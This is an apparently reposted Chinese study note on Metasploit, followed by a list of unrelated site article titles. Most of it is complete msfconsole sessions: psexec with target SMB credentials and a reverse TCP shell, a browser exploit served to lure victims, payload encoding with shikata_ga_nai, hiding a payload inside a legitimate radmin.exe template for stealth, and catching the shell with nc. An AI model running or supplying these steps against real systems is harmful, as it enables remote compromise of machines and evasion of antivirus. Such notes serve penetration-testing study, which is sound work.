msf学习笔记(2)
来源:互联网 发布:php .net哪个好学 编辑:程序博客网 时间:2024/06/03 19:31
exploit分类
Active exploit
示例:
msf > use exploit/windows/smb/psexecmsf exploit(psexec) > set rhost 192.168.1.100rhost => 192.168.1.100msf exploit(psexec) > set payload windows/shell/reverse_tcppayload => windows/shell/reverse_tcpmsf exploit(psexec) > set lhost 192.168.1.1lhost => 192.168.1.1msf exploit(psexec) > set lport 4444lport => 4444msf exploit(psexec) > set smbuser user1 #需要客户机账户名smbuser => user1msf exploit(psexec) > set smbpass pass1 #需要客户机密码smbpass => pass1msf exploit(psexec) > exploit
Passive exploit
示例:
msf > use exploit/windows/browser/ms07_017_ani_loadimage_chunksize ##引导点击网址漏洞msf exploit(ms07_017_ani_loadimage_chunksize) > set srvhost 192.168.1.100srvhost => 192.168.1.100msf exploit(ms07_017_ani_loadimage_chunksize) > set payload windows/shell/reverse_tcppayload => windows/shell/reverse_tcpmsf exploit(ms07_017_ani_loadimage_chunksize) > set lhost 192.168.1.1lhost => 192.168.1.1msf exploit(ms07_017_ani_loadimage_chunksize) > set lport 4444lport => 4444msf exploit(ms07_017_ani_loadimage_chunksize) > exploit
生成payload
msf payload(shell_bind_tcp) > generate #生成payload(RB语言)msf payload(shell_bind_tcp) > generate -b '\x00' #过滤坏字符(编码方式)msf > show encoders #显示编码方式msf payload(shell_bind_tcp) > generate -e php/base64 #手动指定编码方式
payload示例
msf payload(shell_bind_tcp) > generate -b 'x00' -t exe -e x86/shikata_ga_nai -i 5 -k -x /user/share/windows-binaries/radmin.exe -f /root/1.exe#-b 排除坏字符#-t 生成文件类型#-e 使用编码方式#-i 编码次数#-k 隐蔽运营#-x 使用正常文件模板(正常运行程序)#-f 输出文件
控制机
nc 192.168.1.100 4444
NOP(字节滑动)
no-operation / Next Operation(无任何操作)
generate -s 14 #插入14个NOPgenerate -t c #C语言格式
阅读全文
0 0
- msf学习笔记(2)
- msf 学习笔记(1)
- msf学习笔记(3)
- msf学习笔记(4)
- msf学习笔记(5)
- MSF学习笔记(6)
- MSF学习笔记(7)
- MSF学习笔记(8)
- MSF学习笔记(9)
- MSF学习笔记(10)
- 微软MSF框架学习笔记(2)
- MSF笔记(一)
- MSF笔记(二)
- 微软MSF框架学习笔记(1)
- 微软MSF框架学习笔记(3)
- 微软MSF框架学习笔记(4)
- 微软MSF框架学习笔记(5)
- 微软MSF框架学习笔记(6)
- 给Activity设置背景(半)透明
- C# 委托 delegate Action
- Swift WKWebView Cookies
- 亿级规模的Elasticsearch优化实战
- delphi解析json数据的方法
- msf学习笔记(2)
- HBuilder常用快捷键
- Spark实现Hadoop简单实例
- SpringBoot+Logback
- [[NLP]基于Simaese LSTM的句子相似度计算
- 通俗喜感的介绍——HTTP协议—— 简单认识TCP/IP协议-roverliang
- 小米Air笔记本以UEFI模式硬盘GPT分区启动Win7_64位系统
- javascript高级系列之节流[throttle]与防抖[debounce ]
- 10.Spark SQL:销售额统计案例实战